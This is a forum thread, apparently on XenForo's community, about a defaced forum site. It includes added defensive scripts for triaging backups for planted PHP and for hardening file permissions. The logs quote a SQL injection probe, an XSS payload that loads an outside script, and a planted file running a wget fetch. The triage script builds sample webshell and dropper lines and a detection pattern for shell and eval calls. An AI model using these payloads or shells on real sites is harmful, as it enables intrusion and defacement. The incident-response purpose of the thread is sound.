How to properly secure a hosted website and stop defacement / hacks?

koa

Member
Hi, I am helping another user on XF here (who is French and doesn't know English well) and boy, his website is getting hit hard by hackers.

To me, with my limited knowledge of the topic, they've found an exploit in an addon that isn't supported here and whose developer has been blocked from selling addons. They've used SQL injection to deface.

Code:
array (3) {
  ["url"] => string (178) "https://virtual-gaming.fr/members/nunox92.594/recent-content?_xfNoRedirect=-1"%20OR%202%2b769-769-1=0% 2b0% 2b0% 2b1% 20 -% 20 & _xfRequestUri = / members / nunox92.594 / json = & _ xfResponseType "
  ["_GET"] => array (3) {
    ["_xfNoRedirect"] => string (30) "-1" OR 2 + 769-769-1 = 0 + 0 + 0 + 1 - "
    ["_xfRequestUri"] => string (21) "/members/nunox92.594/"
    ["_xfResponseType"] => string (4) "json"
  }
  ["_POST"] => array (0) {
  }
}

# 0 [internal function]: XenForo_Application :: handlePhpError (2, 'system (): Unabl ...', '/ homepages / 7 / d6 ...', 13, Array)
# 1 /homespages/7/d675201067/htdocs/www/library/VirtualGaming/ProfilCustom/ControllerPublic/Custom.php(13): system ('wget https: // cd ...')
# 2 /homespages/7/d675201067/htdocs/www/library/XenForo/FrontController.php(369): VirtualGaming_ProfilCustom_ControllerPublic_Custom-> actionCustomProfile ()
# 3 /homepages/7/d675201067/htdocs/www/library/XenForo/FrontController.php(152): XenForo_FrontController-> dispatch (Object (XenForo_RouteMatch))
# 4 /homepages/7/d675201067/htdocs/www/index.php(13): XenForo_FrontController-> run ()
# 5 {main}

["url"] => string (358) "https://virtual-gaming.fr/members/nunox92.594/recent-content?_xfNoRedirect=1&_xfRequestUri=/members/nunox92.594/&_xfResponseType=json </ script> <svg / onload = '% 2b / "/% 2b / onmouseover = 1 / 2b% (s = document.createElement (/script/.source) 2cs.src% = (/% 2c / 2b% / bxss.me% 5c / s = 002 626% 3FU% 26r% 26h = 1024-5795 = 1024-9115a-2 26% /). slice (2)% 2cdocument.documentElement.appendChild (s)) // '> "

They have backups, but these backups contain shells that allow the hackers to continue hacking the site:

Code:
# 0 [internal function]: XenForo_Application :: handlePhpError (2, 'system (): Unabl ...', '/ homepages / 7 / d6 ...', 13, Array)
# 1 /homespages/7/d675201067/htdocs/www/library/VirtualGaming/ProfilCustom/ControllerPublic/Custom.php(13): system ('wget https: // cd ...')
# 2 /homespages/7/d675201067/htdocs/www/library/XenForo/FrontController.php(369): VirtualGaming_ProfilCustom_ControllerPublic_Custom-> actionCustomProfile ()
# 3 /homepages/7/d675201067/htdocs/www/library/XenForo/FrontController.php(152): XenForo_FrontController-> dispatch (Object (XenForo_RouteMatch))
# 4 /homepages/7/d675201067/htdocs/www/index.php(13): XenForo_FrontController-> run ()
# 5 {main}

The above log happened after removing the first addon.

So it looks like, with the above listed addons and what another developer knows as a... cookie exploit?, they're gaining access pretty easily.

So before we try to find all of these files that the hackers uploaded (or can we call them no-life kids?), what steps should be taken to stop this altogether?

  • How to stop PHP from executing files and removing directories
  • Stop any future XSS/SQL exploits if possible
  • What would be the proper file permissions for the server?
  • Another developer suggests that the addons listed in the above code are clear and aren't the reason for the exploits, but I have to disagree. Who is right?

Xenforo Version: 1.5.16a
Host: 1&1
PHP: 7.0

Thanks!
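Before hunting the uploaded files by hand, a responder would usually run a quick triage pass over the restored backup: list PHP files that call shell or eval functions (the planted Custom.php in the stack trace above calls system() with a wget), list anything PHP-like sitting in the upload directories, and diff file hashes against a known-clean copy of the same XenForo release. The script below is an added example and is not code from this thread, from XenForo or from the host; the sample tree, its file contents and the paths (library/Acme/Custom.php, data/avatars/.cache.php, the clean manifest) are constructed here, and it assumes a GNU/Linux userland (find, grep -E, sha256sum, comm).

```shell
#!/bin/sh
# Added example: triage a restored web root for planted PHP.
# Assumes GNU/Linux tools (find, grep -E, sha256sum, comm). Not XenForo's code.
set -u

# Calls a webshell needs and that stock XenForo 1.x files almost never make.
# A hit is a lead to review by hand, not a verdict.
SUSPECT_RE='(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)[[:space:]]*\(|base64_decode[[:space:]]*\('

# 1. PHP files anywhere under the web root that contain shell/eval calls.
suspect_php_files() {        # $1 = web root
    find "$1" -type f -name '*.php' -exec grep -lE "$SUSPECT_RE" {} + | sort
}

# 2. Any PHP-like file inside directories that should only ever hold uploads.
php_in_upload_dirs() {       # $1 = web root
    root=$1
    for d in data internal_data; do
        [ -d "$root/$d" ] && find "$root/$d" -type f \
            \( -name '*.php' -o -name '*.phtml' -o -name '*.phar' \)
    done | sort
}

# 3. Files added or modified relative to a manifest taken from a known-clean
#    tree (for example the unpacked XenForo release zip of the same version).
make_manifest() {            # $1 = tree; prints "sha256  ./relative/path" lines
    ( cd "$1" && find . -type f -name '*.php' -exec sha256sum {} + | sort )
}
changed_files() {            # $1 = clean manifest file, $2 = tree to check
    make_manifest "$2" > "$2.manifest"
    # lines present only in the checked tree's manifest = new or altered files
    sort "$1" | comm -13 - "$2.manifest" | awk '{print $2}'
}

# --- constructed sample tree standing in for the restored backup ---
WORK=$(mktemp -d)
CLEAN=$WORK/clean
SUSPECT=$WORK/restored
mkdir -p "$CLEAN/library/XenForo" "$SUSPECT/library/XenForo" \
         "$SUSPECT/library/Acme" "$SUSPECT/data/avatars" "$SUSPECT/internal_data"
# a stand-in for an untouched core file, identical in both trees
printf '<?php\nclass XenForo_FrontController { public function run() { return true; } }\n' \
    > "$CLEAN/library/XenForo/FrontController.php"
cp "$CLEAN/library/XenForo/FrontController.php" "$SUSPECT/library/XenForo/FrontController.php"
# a planted dropper of the shape seen in the thread's stack trace (constructed)
printf '<?php\nsystem("wget https://example.invalid/x.sh");\n' > "$SUSPECT/library/Acme/Custom.php"
# an obfuscated shell hidden as a dotfile in an upload directory (constructed)
printf '<?php\neval(base64_decode($_POST["c"]));\n' > "$SUSPECT/data/avatars/.cache.php"
make_manifest "$CLEAN" > "$WORK/clean.manifest"

echo "== PHP files calling shell/eval functions =="
suspect_php_files "$SUSPECT"
echo "== PHP-like files inside upload directories =="
php_in_upload_dirs "$SUSPECT"
echo "== Files missing from or differing against the clean manifest =="
changed_files "$WORK/clean.manifest" "$SUSPECT"
# rm -rf "$WORK" when finished
```

The manifest check is the one that scales: a file that matches the release hash needs no reading, and everything else (add-on code included) is the review queue. Run all three against the backup before anything from it is imported, since the thread already shows the backups carry the shells.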
As was explained here, https://xenforo.com/community/threads/third-deface-attack.139312/post-1206286

"Slavik" said:
Take the site offline and firewall via whitelist only to your IP.

Create a new xenforo install.

Perform a xenforo to xenforo import. Leave everything behind except what is imported by xenforo and known to be safe/clean.

Get a new, secured server set up.

Move your now known clean xenforo to your new server.

I've done this for several people in the past; hit me up if you want a quote.

Also, remove any add-ons from said developer.
AFAIK it will NOT import add-on data.
All you could do is contact those add-on authors and see if it's possible to write a process to import them into the new DB, but it's most likely going to be cost prohibitive.

Another option is to lock down the site to restricted IP access and then contact someone to clean the server/site up....

As far as file permissions go... /data and /internal_data can have world write access, but I usually restrict it to the HTTP service and PHP processor.
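The permission split described above (code read-only for the web server, only data/ and internal_data/ writable, and those only by the HTTP/PHP group) together with the OP's question about stopping PHP from executing files, as an added example. This is not the host's or XenForo's configuration: the sample tree is constructed, the chown line is shown but not run because it needs root, the group name www-data and the open_basedir path are placeholders, and the .htaccess assumes Apache 2.4 with AllowOverride enabled and GNU coreutils for stat -c.

```shell
#!/bin/sh
# Added example, not XenForo's or the host's configuration.
# Assumes Apache 2.4 (Require directive), GNU stat, and a web-server group
# named www-data (placeholder).
set -u

# Code is read-only for the web server; the deploying account owns the files.
harden_permissions() {      # $1 = XenForo web root
    root=$1
    # chown -R deploy:www-data "$root"   # needs root: owner = deploy user, group = web server
    find "$root" -type d -exec chmod 755 {} +
    find "$root" -type f -exec chmod 644 {} +
    for d in data internal_data; do
        [ -d "$root/$d" ] || continue
        # group-writable only, no "other" bits; setgid (2) keeps the group on
        # files PHP creates, so the web server never needs world write
        find "$root/$d" -type d -exec chmod 2770 {} +
        find "$root/$d" -type f -exec chmod 660 {} +
    done
}

# Apache: refuse to serve or execute anything PHP-like from an upload tree.
write_no_php_htaccess() {   # $1 = directory (data or internal_data)
    cat > "$1/.htaccess" <<'EOF'
# Uploads only: never execute scripts placed here
<FilesMatch "\.(php|phtml|php[0-9]|phar)$">
    Require all denied
</FilesMatch>
EOF
}

# PHP: remove the primitives the planted dropper relied on (system("wget ...")).
# Apply in php.ini or a per-site .user.ini and test the site afterwards; an
# add-on that genuinely needs exec() will then fail visibly instead of silently.
php_ini_hardening() {       # prints a php.ini fragment; open_basedir path is a placeholder
    cat <<'EOF'
disable_functions = system,exec,shell_exec,passthru,popen,proc_open,pcntl_exec
open_basedir = /path/to/www:/tmp
EOF
}

perm_of() { stat -c '%a' "$1"; }   # octal mode, e.g. 2770

# --- constructed sample tree standing in for the web root ---
ROOT=$(mktemp -d)/www
mkdir -p "$ROOT/library/XenForo" "$ROOT/data/avatars" "$ROOT/internal_data"
printf '<?php\n' > "$ROOT/library/XenForo/Application.php"
printf 'jpegdata' > "$ROOT/data/avatars/l_1.jpg"
write_no_php_htaccess "$ROOT/data"
write_no_php_htaccess "$ROOT/internal_data"
harden_permissions "$ROOT"

printf 'data/ directory:   %s\n' "$(perm_of "$ROOT/data")"
printf 'uploaded avatar:   %s\n' "$(perm_of "$ROOT/data/avatars/l_1.jpg")"
printf 'core PHP file:     %s\n' "$(perm_of "$ROOT/library/XenForo/Application.php")"
echo '--- php.ini fragment ---'
php_ini_hardening
```

Two caveats a practitioner would check: the .htaccess only works if the vhost allows overrides for that directory (otherwise put the same FilesMatch block in the vhost config, or the equivalent location rule in nginx), and disable_functions is a per-process PHP setting, so it has to land in the ini that the site's PHP handler actually reads. Neither replaces the rebuild from a clean install that the replies above recommend; they limit what a re-planted file could do afterwards.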
they've found an exploit in an addon that isn't supported here and whose developer has been blocked from selling addons. They've used SQL injection to deface.
You’re wasting your time trying to fix this addon if that’s the case. The addon needs to be written to mitigate SQL injections for ALL input fields. Adjusting file permissions will do nothing if they have full access to your database anyway via SQL injections.

What addon is it? Can you find an alternative from a reputable trusted developer? How many members/entries does this addon use? Can you manually copy and paste values into the new plugin by using a Login as User plugin maybe?

As everyone has said above, you must start fresh on a newly set up server with a fresh XF install, import your old XF install, and absolutely only install trusted addons.